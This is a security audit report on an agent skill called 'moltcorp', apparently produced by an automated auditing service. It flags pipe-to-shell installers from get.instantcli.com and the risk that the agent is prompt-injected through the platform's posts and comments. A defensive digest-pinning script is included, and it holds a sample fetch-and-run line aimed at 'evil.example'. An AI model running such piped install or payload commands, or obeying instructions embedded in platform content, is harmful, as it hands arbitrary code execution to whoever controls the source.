moltcorp
Fail
Audited by Gen Agent Trust Hub on Mar 6, 2026
Risk Level: HIGH (REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, PROMPT_INJECTION)
Full Analysis
- [REMOTE_CODE_EXECUTION]: The documentation instructs users to install a CLI tool by piping remote scripts directly into the system shell using 'curl -fsSL https://get.instantcli.com/moltcorp/install.sh | sh' and, on Windows, 'irm https://get.instantcli.com/moltcorp/install.ps1 | iex'. Both commands execute whatever the server returns at that moment, with no pinned digest or signature to check against and no opportunity to read the script before it runs. The source domain is not a recognized vendor or well-known service, so nothing beyond the TLS connection establishes who controls the script, and a compromised or substituted endpoint would yield arbitrary code execution on the user's machine.
- [COMMAND_EXECUTION]: The skill has the agent run local commands, both through the CLI tool (e.g., 'moltcorp agents register', 'moltcorp configure') and directly ('git push'), that interact with system resources and handle authentication tokens.
- [EXTERNAL_DOWNLOADS]: The skill initiates downloads of installation scripts from an external, non-whitelisted domain (get.instantcli.com) and references external markdown files on the vendor's primary website.
- [PROMPT_INJECTION]: The skill operates on a collaborative platform where the agent is expected to process external content that could contain malicious instructions.
  1. Ingestion points: The agent retrieves untrusted data from 'Posts', 'Comments', and 'Context' via the 'moltcorp context' command.
  2. Boundary markers: No delimiters or warnings to ignore embedded instructions are specified in the documentation for handling platform data.
  3. Capability inventory: The agent has the capability to execute shell commands, perform Git operations, and submit tasks to the platform.
  4. Sanitization: There is no evidence of input validation or content filtering to prevent the agent from obeying instructions embedded in the collaborative data it processes.
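The REMOTE_CODE_EXECUTION finding above turns on the fact that 'curl ... | sh' runs the script before anyone can verify or read it. The following is an added example, not code from the moltcorp documentation or from this audit: it stages the script to disk, pins it to a SHA-256 digest obtained out-of-band, and only executes it if the digest matches. The digest used in the demonstration is computed from a constructed local file so the example runs offline; in real use the pin would come from a vendor-published, ideally signed, release manifest, which the moltcorp documentation does not provide.

```shell
#!/bin/sh
# Added example: a pinned replacement for 'curl -fsSL <url> | sh'.
# Assumptions: the expected SHA-256 is obtained out-of-band from the vendor
# (the demo below computes it from a constructed file instead), and either
# sha256sum (coreutils) or shasum (macOS/Perl) is installed.
set -eu

sha256_of() {
  # Print the hex SHA-256 digest of a file with whichever tool exists.
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  else
    shasum -a 256 "$1" | cut -d' ' -f1
  fi
}

# verify_pinned FILE EXPECTED_SHA256 -> exit 0 on match, 1 otherwise.
verify_pinned() {
  actual=$(sha256_of "$1")
  [ "$actual" = "$2" ]
}

# install_pinned URL EXPECTED_SHA256: download to a temp file, refuse to run
# on digest mismatch, and leave the file on disk so it can be reviewed first.
# Not invoked in this offline demonstration.
install_pinned() {
  url=$1; expected=$2
  tmp=$(mktemp)
  curl -fsSL --proto '=https' --tlsv1.2 -o "$tmp" "$url"
  if ! verify_pinned "$tmp" "$expected"; then
    echo "digest mismatch for $url; refusing to execute $tmp" >&2
    return 1
  fi
  sh "$tmp"
}

# --- offline demonstration with constructed files (not real vendor scripts) ---
good=$(mktemp)
printf '#!/bin/sh\necho "installer ran"\n' > "$good"
pin=$(sha256_of "$good")   # stands in for the vendor-published digest

# A tampered copy simulates a substituted install script: same prefix, plus
# an appended line that would itself fetch and run more remote code.
tampered=$(mktemp)
cp "$good" "$tampered"
printf 'curl -s https://evil.example/x | sh\n' >> "$tampered"

if verify_pinned "$good" "$pin"; then
  echo "pinned digest matches; safe to review and run $good"
fi
if verify_pinned "$tampered" "$pin"; then
  echo "BUG: tampered script accepted" >&2
else
  echo "tampered copy rejected; not executed"
fi
```

The same discipline applies to the PowerShell path: download 'install.ps1' to a file with Invoke-WebRequest, compare Get-FileHash output against a pinned digest, read the file, and only then run it, instead of piping 'irm' into 'iex'.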
Recommendations
- HIGH: Downloads and executes remote code from https://get.instantcli.com/moltcorp/install.sh (and https://get.instantcli.com/moltcorp/install.ps1 on Windows) - DO NOT USE without downloading and thoroughly reviewing the scripts first
- AI detected serious security threats
Audit Metadata